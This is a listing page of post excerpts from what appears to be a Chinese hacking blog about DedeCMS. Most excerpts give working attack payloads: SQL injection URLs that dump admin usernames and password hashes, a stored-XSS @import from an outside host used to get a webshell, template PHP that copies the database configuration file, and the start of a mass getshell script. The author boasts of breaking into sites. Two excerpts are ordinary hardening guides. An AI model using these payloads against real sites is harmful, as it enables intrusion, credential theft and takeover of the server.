DedeCMS 20140201 之前的5.7通杀

分类:安全 | 2015-01-28 | 撸过 2,021 次
1人扯谈

无需注册会员账号:

Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'
or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select
CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`
limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type]
[type]=application/octet-stream&[......]

继续阅读

[通杀]dedecms plus/search.php 注入漏洞利用EXP

分类:安全 | 2013-01-23 | 撸过 3,390 次
5人扯谈

哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。

既然已经发出来了,我就把我自己搞的exp发下吧。。唉。

我一般是这样测试的:

提交

https://webshell.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a

 

看结果如果提示

Safe Alert: Request Error step 2 !

那么直接用下面的exp

https://webshell.cc/pl[......]

继续阅读

为了dede系统安全把data目录迁移到web以外目录

分类:技术 | 2012-02-29 | 撸过 397 次
0人扯谈

data目录是系统缓存和配置文件的目录,一般都有可以读写的权限,只要是能够写入的目录都可能存在安全隐患,很多站长甚至给予这个目录可执行的权限,更是非常危险,所以我们建议将这个data目录搬移出Web可访问目录之外。本篇将介绍如何将data目录搬移出Web访问目录。

1.将data目录转移到非Web目录

我们这里举例“D:\dedecms\v57”为我们系统的根目录,我们需要将目录下的data文件夹(如图1)迁移要上一级目录(非Web目录),简单的办法直接剪切或者拷贝即可。

[......]

继续阅读

dedecms xss 通杀所有版本 dede 5.6 dede 5.7 直接获取webshell

分类:安全 | 2012-02-14 | 撸过 3,263 次
0人扯谈

DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)

  目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:

  1. 开启注册
  2. 开启投稿

注册会员-发表文章投稿,内容如下填写:

<style>@im\port'\https://webshell.cc/xss.css';</style>

在你自己的网站webshell.cc上新建xss.css内容如下:

body{ background-image:url('jav[......]

继续阅读

DEDECMS安全设置指南

分类:技术 | 2012-01-30 | 撸过 413 次
0人扯谈

   DEDECMS 这名词细想起来,我还是有一份特殊的感情的,当初做网站的时候,最早用的动易CMS2006,后来转PHP后,一直用的DEDECMS,只是现今不在用了而已,可以说,它造就了很多中小站长,是中小站长的福音。

下面就DEDECMS的安全设置,简单记录下。
1、尽量使用纯PHP的主机空间,如果非要使用WINDOWS,最好关闭非所有PHP支持;
2、更改默认的 www.webshell.cc/dede/类管理地址;
3、给默认的admin管理帐号分配没有权限的用户组;
4、data/common.inc.php文件属性(Linux/Unix)设置为644或(Windows NT)设置[......]

继续阅读

dedecms通杀SQL注入

分类:安全 | 2012-01-1 | 撸过 508 次
0人扯谈

# Dede Cms All Versions Sql Vulnerability Exploit
# </ No Priv8 , Everything is Public >
# Date: 30/12/2011 - 13:00
# Author: [ CWH ] | Finded By : Nafsh
# We Are : Mr.M4st3r , Nafsh , Skote_Vahshat , HijaX
# Support: Cyberwh.org
# Mail: Nafsh@live.com
# Software Website: http://www.dedecms.[......]

继续阅读

dedecms 5.7 - 游客无限刷顶踩数值

分类:安全 | 2011-12-30 | 撸过 467 次
0人扯谈

只测试了DEDECMS V5.7系统,之前的版本估计也一样。

在官方地址进行的简单测试,应该算是一个小BUG,利用这个可以无限的刷某篇文章的顶/踩 数值。

详细说明:虽然前端页面做了 游客 只能提交一次的限制,但是直接以URL访问则没有限制,只要按着F5不放,一会就能上百上千。。。。

而且dede的官方也木有做这方面的限制。。。你懂的

漏洞证明:http://www.dedecms.com/plus/feedback.php?aid=1102&action=bad&fid=1102

http://www.dedecms.com/news/2011/1201/1102.[......]

继续阅读

dede0day 利用小技巧

分类:安全 | 2011-11-18 | 撸过 363 次
0人扯谈

By:zafe

遇到可写不可执行的,可执行不可写的站的也许用的上

{dede:php}copy('../data/common.inc.php','../data/cache/test.txt');{/dede:php}

然后去xxx.com/data/cache/test.txt看数据库信息,如果是root那就happy吧

如果是普通用户,首先看下有哪些数据库:

//自行把{dede:php}{/dede:php}之间的内容替换成下面的,结果都是到data/cache/test.txt去看

$xdb = mysql_connect("localhost","[......]

继续阅读

DedeCMS. 织梦科技注入爆管理员用户密码方法

分类:安全 | 2011-08-26 | 撸过 1,261 次
0人扯谈

搜索关键词:powered by dedecms

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select[......]

继续阅读

dede批量Getshell放出来吧

分类:安全 | 2011-08-26 | 撸过 4,110 次
9人扯谈

好吧之前就把google发在了90sec 跟t00ls了!不过过了一会黑阔们就去扫描我shell地址了!
额滴神啊,速度太快了!!没办法马上赶写了一个批量修改文件名称的把shell全部移动了地方修改了文件名!
最后再把漏洞文件给那个啥了!不过一看黑阔们又挖出shell地址出来了!!
好吧不跟你们耗了。想想还是把代码发出来吧!!

这个是百度批量的。自己保存为xx.php

<?php
print_r('
[-]Exploit Title: DEDEcmsVariable coverage
[-]Date: 1182011
[-]Getshell Author: cfking#90sec.[......]

继续阅读